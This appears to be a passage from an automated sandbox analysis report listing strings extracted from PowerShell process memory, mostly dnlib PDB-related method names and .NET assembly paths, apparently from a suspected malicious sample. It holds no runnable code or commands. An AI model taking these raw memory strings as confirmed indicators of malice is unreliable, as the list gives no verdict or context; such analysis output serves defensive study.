    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: *.pdbQ source: powershell.exe, 00000004.00000002.1818349189.000001783941B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1817018540.00000178390AF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1817018540.00000178390AF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.1818818016.000001783947D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1818818016.000001783947D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.1825456759.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.1818349189.00000178393F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1817018540.0000017839048000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.pdbempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows source: powershell.exe, 00000004.00000002.1785773147.000001781F052000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1818349189.00000178393F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1817018540.00000178390AF000.00000004.00000020.00020000.00000000.sdmp
